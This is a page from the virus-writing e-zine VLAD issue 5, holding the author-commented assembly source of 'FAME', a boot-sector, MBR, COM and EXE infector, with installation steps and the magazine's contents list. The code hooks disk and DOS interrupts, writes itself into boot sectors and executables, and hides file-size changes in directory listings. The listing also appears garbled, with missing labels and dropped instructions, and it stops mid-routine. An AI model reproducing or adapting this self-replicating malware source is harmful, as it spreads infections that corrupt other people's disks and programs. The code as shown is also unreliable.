Virus Labs & Distribution
VLAD #5 - Fame

; FAME by Quantum / VLAD
; This will be my last virus that I write for VLAD.. mainly because I have
; grown bored with the virus scene and had my "taste of fame". I hope that
; someone will learn something from this virus as often coders just look
; at virus code and see a mess. I have moved on from "hack coding" and
; hope that one day you also will do so. Neways.. Here are the specs:
; Boot/Com/Exe Infector with minimum stealth aimed at fast infection.
; It contains no payload and is designed for educational purposes.
; To install you will have to copy the boot sector off a disk
; onto absolute sector 1,0,14 and then copy the first 256 bytes
; from the .bin created with a86 over the boot sector then copy the
; remaining bytes over sector 1,0,15 and finally boot off the disk.

org 0

; on entry to a boot sector cs=0 and ip = 7c00h

xor ax,ax
mov ss,ax
mov si,7c00h      ; there is no stack so you have to setup your own
mov sp,si

push cs
pop ds

int 12h           ; get the current top of memory

dec ax            ; decrease it by 1k

mov [413h],ax     ; tell bios about it

mov cl,06h        ; convert that to a segment
shl ax,cl

mov cx,0200h
mov bx,cx
mov es,ax         ; copy the first half of da virus into that segment
xor di,di
rep movsb

mov ax,0201h
mov dh,1
mov cx,15         ; load the second half of da virus off the disk into
or dl,dl          ; the second half of the segment
jns tisflop2
mov cx,3
xor dh,dh
int 13h

mov byte ptr es:[offset i21set],0          ; we have yet to setup int 21

mov si,13h*4
mov di,offset oi13
push si
movsw                                 ; setup the int 13 handler
pop si
mov word ptr [si],offset int13h
mov word ptr [si+2],es

int 19h                      ; load the real boot sector


        ; write org sector to 1,0,14 on floppies
        ; write second half of virus at 1,0,15 on floppies
        ; write org sector to 0,0,2 on mbr
        ; write second half of virus at 0,0,3 on mbr

        cmp ax,0121h
        jnz not13serv               ; int 13 installation check
        xor cx,cx

        cmp ah,2                   ; are we reading ?
        jnz return

        call callit
        jc justretf

        push ax
        push bx
        push cx
        push dx
        push es

        or dh,dh         ; dh,dh = all .. dx,dx = floppy only..
        jnz checkit
        cmp cx,1
        jnz checkit

        cmp word ptr es:[bx+offset marker],"uQ"   ; is the boot already infected ?
        jz stealthit


        mov cl,14
        mov dh,1
        or dl,dl
        jns tisflop      ; no.. infect it
        mov cl,2
        xor dh,dh
        mov ax,0301h
        call callit
        inc cl
        push cs
        pop es
        mov bx,200h
        mov ax,0301h
        call callit

        xor bx,bx

        mov cl,1
        xor dh,dh
        mov ax,0301h
        call callit

        pop es
        pop dx
        pop cx
        pop bx
        pop ax

        retf 2


        mov cl,14
        mov dh,1
        or dl,dl
        jns tisflop1       ; yes .. so stealth it
        mov cl,2
        xor dh,dh
        mov ax,0201h
        call callit

        jmp getout


        db 0eah
oi13    dw 0,0


        call far ptr cs:[offset oi13]    ; call the original int 13

        ; check to see if we're reading an exe and if so setup int21 if
        ; we havnt already done so

        cmp byte ptr cs:[offset i21set],1       ; already setup ?
        jz getout

        cmp word ptr es:[bx],"ZM"       ; starts with 'MZ' ?
        jnz getout

        push ds
        push si
        push di

        xor ax,ax
        mov ds,ax

        push cs
        pop es

        mov si,21h*4
        mov di,offset oi21
        push si
        movsw                              ; setup int 21
        pop si
        mov word ptr [si],offset newi21
        mov word ptr [si+2],es

        mov byte ptr cs:[offset i21set],1    ; set the flag so we wont do it again

        pop di
        pop si
        pop ds

        jmp getout

        db "FAME by "
marker: db "Quantum / VLAD"

newi21:         ; the new int 21 handler

        cmp ax,2021h
        jnz notserv            ; are we checking for residence ?
        mov cx,2021h

        xchg ah,al

        cmp al,4bh                ; are we executing ?
        jz executing
        cmp al,11h
        jz dirstealth          ; are we diring ?
        cmp al,12h
        jz dirstealth

        push ax
        push cx
        push ds
        push es
        push si
        push di
        mov ax,0121h                ; is int 13 already setup ?
        mov cx,ax
        int 13h
        or cx,cx
        jz werein
        mov ds,cx
        push cs
        pop es
        mov si,13h*4
        mov di,offset oi13              ; if not set it up
        push si
        pop si
        mov word ptr [si-4],offset int13h
        mov [si-2],es
        pop di
        pop si
        pop es
        pop ds
        pop cx
        pop ax

        xchg ah,al

        db 0eah
oi21    dw 0,0
i21set  db 0

call21: pushf
        call far ptr cs:[offset oi21]       ; calls the original int 21


        xchg ah,al
        call call21                    ; let the dir read through

        push ax
        push bx
        push cx
        push dx
        push si
        push di
        push ds
        push es

        or al,al
        jnz dirfail

        mov ah,2fh         ; get dta
        call call21

        push es
        pop ds

        cmp byte ptr [bx],0FFh             ; is it extended fcb ?
        jnz notext
        add bx,7

        cmp word ptr [bx+17h],0           ; is the time 0 ?
        jnz dirfail

        sub word ptr [bx+1dh],offset vend          ; stealth the size
        sbb word ptr [bx+1fh],0

dirfail:pop es
        pop ds
        pop di
        pop si
        pop dx
        pop cx
        pop bx
        pop ax

        retf 2


        push ax
        push bx
        push cx
        push dx
        push si
        push di
        push ds
        push es

        mov ax,03d02h
        call call21           ; open in read/write mode

        xchg bx,ax

        call seekstart            ; goto the start

        push cs
        push cs
        pop ds
        pop es

        mov ah,3fh
        mov cx,18h
        mov dx,offset buffer           ; read in first 18h bytes
        mov si,dx
        call call21

        call isitinfected
        jz closefile                     ; is the file already infected ?
        and cl,11100000b
        or cl,2

        push cx
        push dx

        cmp word ptr [si],"ZM"          ; is it an exe ?
        jz infectexe

        jmp cominfect


        mov di,offset jumpsave

        mov ax,[si+14h]
        mov ax,[si+16h]             ; save the old entrypoint and stack
        mov ax,[si+0eh]
        mov ax,[si+10h]

        call seekend           ; goto end of the file

        mov cx,16                ; calculate the size in paragraphs
        DIV cx

        add dx,20h
        dec ax
        dec ax
        jc closefile

        sub ax,[si+08h]
        add dx,offset comstart  ; calculate the new entrypoint
        mov [si+14h],dx
        mov [si+16h],ax

        mov byte ptr ds:[offset comorexe],0     ; set the comorexe flag to nil

        mov cx,offset vend
        xor dx,dx                                 ; dump the virus
        call writefile

        call seekend           ; goto the end

        mov cx,512
        DIV cx                ; calculate the image size
        inc ax

        mov [si+2],dx
        mov [si+4],ax        ; shove it in the header
        mov [si+0eh],ax
        mov [si+10h],0400h     ; setup the stack

        call seekstart       ; back to the start

        mov cx,18h
        mov dx,si             ; dump the exe header
        call writefile

        jmp settime


        mov ah,3eh           ; close the file
        call call21

        pop es
        pop ds
        pop di
        pop si
        pop dx
        pop cx
        pop bx
        pop ax

        jmp playold

buffer: db 18h dup (0)
jmpblock: db 0e9h,0,0
comorexe: db 0

        call seekend        ; goto end of the com

        push ax

        mov cx,3
        mov dx,si                ; write the first 3 bytes
        call writefile

        mov byte [offset comorexe],1        ;set the comorexe flag

        mov cx,offset vend
        xor dx,dx                  ; dump the virus
        call writefile

        pop ax
        add ax,offset comstart            ; setup the jump construct
        mov [offset jmpblock+1],ax

        call seekstart             ; back to the start

        mov cx,3
        mov dx,offset jmpblock        ; write the jump block
        call writefile


        pop dx
        pop cx

        mov ax,05701h              ; set the time
        call call21

        jmp closefile

        mov ax,04202h              ; seek to end
        xor cx,cx
        xor dx,dx               ; seek to rest
        call call21

        mov ax,04200h         ; seek to start
        jmp lseek

        mov ah,40h             ; write to the file
        call call21


        mov ax,5700h      ; check the time to seek if infected
        call call21

        push cx
        and cl,11111b
        cmp cl,2
        pop cx


comstart:           ; code that will be executed on start of file infections

        push es       ; save the psp

        call recalc
recalc: pop bp                           ; calculate the delta offset
        sub bp,offset recalc

        mov ax,2021h
        int 21h               ; check to see if int21 setup
        cmp cx,2021h
        jz nowrites

        mov ax,es
        dec ax             ; get the mcb
        mov ds,ax

        xor si,si
        cmp byte ptr [si],"Z"       ; is it last block ?
        jnz nowrites

        sub word ptr [si+3],(offset vend)/16+1
        sub word ptr [si+12h],(offset vend)/16+1      ; deallocate some space
        mov ax,[si+12h]
        mov es,ax

        mov ds,si

        mov si,84h

        push es
        push cs
        pop ds                                        ; setup int 21
        lea di,[bp+offset oi21]
        pop es

        mov word ptr [si-4],offset newi21
        mov word ptr [si-2],es

        push cs
        pop ds

        mov si,bp
        xor di,di
        mov cx,offset vend            ; copy the virus into memory
        rep movsb


        pop es
        cmp byte [bp+offset comorexe],1     ; is it a com or exe ?
        jz comreturn

        mov ax,es
        add ax,10h
        lea di,[bp+jumpsave+2]
        add [di],ax
        add ax,[di+4]
        mov ss,ax                         ; return to host for exes
        mov sp,[di+6]
        jmp $+2
        db 0eah
jumpsave: dw 0,0
          dw 0,0

        push cs
        pop es
        lea si,[bp-3]
        mov di,0100h              ; return to host for coms
        push di



ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


ARTICLE.2_2       Neuroquila disasm
ARTICLE.2_3       Uruguay#3 disasm
ARTICLE.2_4       Immortal Riot
ARTICLE.2_5       Fog.doc
ARTICLE.2_6       Fog.asm
ARTICLE.2_7       AP-Poly


Dying Oath
ARTICLE.3_2       Win API tutorial
ARTICLE.3_3       Poly primer
ARTICLE.3_4       NoMut v0.01
ARTICLE.3_5       Demon3b
ARTICLE.3_6       SDFEe20 source
ARTICLE.3_7       ZL 2.0 source


Virus Descriptions
ARTICLE.4_2       Horsa
ARTICLE.4_3       Ph33r
ARTICLE.4_4       Wintiny
ARTICLE.4_5       Midnight
ARTICLE.4_6       Arme Stoevlar
ARTICLE.4_7       Small Virus


ARTICLE.5_2       Winlamer2
ARTICLE.5_3       Lady Death
ARTICLE.5_4       H8urNMEs
ARTICLE.5_5       Sepboot
ARTICLE.5_6       Fame
ARTICLE.5_7       Int Patch

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